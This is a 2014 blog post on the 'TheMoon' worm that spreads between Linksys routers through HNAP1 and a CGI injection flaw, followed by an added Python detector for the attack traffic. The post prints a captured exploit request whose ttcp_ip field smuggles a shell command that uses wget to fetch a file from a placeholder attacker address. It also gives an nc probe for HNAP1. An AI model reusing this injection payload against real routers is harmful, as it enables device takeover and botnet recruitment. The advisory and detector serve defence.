Monday, 17 February 2014
On 06:08 by Unknown in Exploit Code, Hacking Belkin Rounter, Hacking Router, Linksys Devices, Linksys Routers, Malware, Network Hacking, Router Hacking, Security Flaw, Vulnerability No comments
Linksys Malware Spreading from Router to Router
Hello everyone, I'm here to explain how new malware found in Linksys routers is spreading everywhere. Some 1,000 devices have been hit by the worm, which seeks out others to infect. Here are the complete details.
Researchers say they have uncovered an ongoing attack that infects home and small-office wireless routers from Linksys with self-replicating malware, most likely by exploiting a code-execution vulnerability in the device firmware.
Which wireless router do you have at your home or office? If it’s a Linksys router, you could be at risk from new malware that attacks your firmware and replicates itself.
Security researcher Johannes B. Ullrich from the SANS Technology Institute has warned about self-replicating malware that exploits authentication bypass and code-execution vulnerabilities in the Linksys wireless routers.
The malware, named ‘THE MOON’, scans for other vulnerable devices in order to spread from router to router, and Johannes confirmed that the worm has already infected around 1,000 Linksys E1000, E1200, and E2400 routers.
"We do not know for sure if there is a command and control channel yet," Ullrich wrote in the update. "But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm."
To compromise a router, the malware remotely calls the Home Network Administration Protocol (HNAP), which allows identification, configuration and management of networking devices.
The malware first requests the model and firmware version of the router using HNAP, and if the device is found to be vulnerable, it sends a CGI script exploit to gain local command execution on the device.
Linksys's parent company Belkin has confirmed that the HNAP1 implementation has a security flaw whose exploit code is publicly available on the Internet.
“There are about 670 different IP ranges that it scans for other routers. They appear to all belong to different cable modem and DSL ISPs. They are distributed somewhat worldwide.”
To what extent this worm can be dangerous is still an open question.
“We are still working on analysis what it exactly does. But so far, it looks like all it does is spread (which is why we call it a worm). It may have a ‘call-home’ feature that will report back when it infected new hosts.”
To check whether your device is vulnerable, use the following command (whether echo needs -e depends on your OS):
echo [-e] "GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n" | nc routerip 8080
If you receive an XML HNAP reply, your device is likely vulnerable to the worm affecting Linksys devices, and some preventive measures should be taken. Also keep an eye on the logs for ports 80 and 8080.
Users are advised to disable Remote Administration on their device or to limit administration rights to a small number of trusted IP addresses.
Bandwidth Consuming
The worm came to light earlier this week after the operator of a Wyoming ISP contacted SANS and reported a large number of customers with compromised Linksys routers. As the routers scanned IP ports 80 and 8080 as fast as they could, they consumed the bandwidth of the unidentified ISP's customers, slowed down their legitimate activity, and interrupted streams and VPN connections.
The security exploit that's used by the worm will work on all current and recent Linksys routers, including the entire E-series as well as Valet routers and some with "WRT" part numbers (for example, the WRT160). However, this particular worm seems to focus on the E-series and appears to be aimed at marshaling a botnet. So far, it does not appear that the malware flashes itself in, so it can be removed by a reboot. But it appears that any router with stock firmware that's exposed to the Internet can be reinfected even if it has a secure password.
The initial request in the attack typically begins with the strings "GET /HNAP1/ HTTP/1.1" and then "Host: [ip of host]:8080." The following requests look like this:
    POST /[withheld].cgi HTTP/1.1
    Host: [ip of honeypot]:8080
    User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[ip of honeypot]:8080/
    Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH
When decoded, the request is translated to:
submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi` &StartEPI=1
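For watching the port 80 and 8080 logs, the request sequence described above (an HNAP1 probe followed by a CGI POST whose ttcp_ip field carries shell metacharacters) can be flagged with a small detector. This is an added example, not code from the original post or from SANS; the tuple record layout, the function names, the `.cgi` paths and all sample values are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Shell metacharacters that have no place in an IP-address form field.
SHELL_META = re.compile(r"[`;|&]|\$\(")

def classify(method, path, body=""):
    """Return 'hnap_probe', 'ttcp_injection' or None for one HTTP request."""
    path = path.split("?", 1)[0]
    if method == "GET" and path.rstrip("/").upper() == "/HNAP1":
        return "hnap_probe"
    if method == "POST" and path.lower().endswith(".cgi"):
        fields = parse_qs(body, keep_blank_values=True)  # URL-decodes values
        if any(SHELL_META.search(v) for v in fields.get("ttcp_ip", [])):
            return "ttcp_injection"
    return None

def scan(requests):
    """requests: iterable of (src_ip, method, path, body) in arrival order.
    Returns {src_ip: verdict}; 'worm_sequence' means probe, then injection."""
    seen_probe, verdicts = set(), {}
    for src, method, path, body in requests:
        kind = classify(method, path, body)
        if kind == "hnap_probe":
            seen_probe.add(src)
            verdicts.setdefault(src, "hnap_probe")
        elif kind == "ttcp_injection":
            verdicts[src] = "worm_sequence" if src in seen_probe else kind
    return verdicts

# Constructed sample records (documentation IP ranges, placeholder command
# and placeholder CGI names); not captured traffic.
SAMPLE = [
    ("198.51.100.7", "GET", "/HNAP1/", ""),
    ("198.51.100.7", "POST", "/withheld.cgi",
     "submit_button=&ttcp_num=2&ttcp_size=2"
     "&ttcp_ip=-h+%60placeholder-command%60&StartEPI=1"),
    ("192.0.2.10", "GET", "/HNAP1/", ""),
    ("192.0.2.20", "POST", "/example.cgi",
     "submit_button=&ttcp_ip=192.168.1.50&StartEPI=1"),
    ("203.0.113.5", "GET", "/index.html", ""),
]

if __name__ == "__main__":
    for src, verdict in scan(SAMPLE).items():
        print(src, verdict)
```

A source that only probes HNAP1 is reported separately from one that follows the probe with the injection POST, so scanning noise can be triaged apart from actual exploitation attempts.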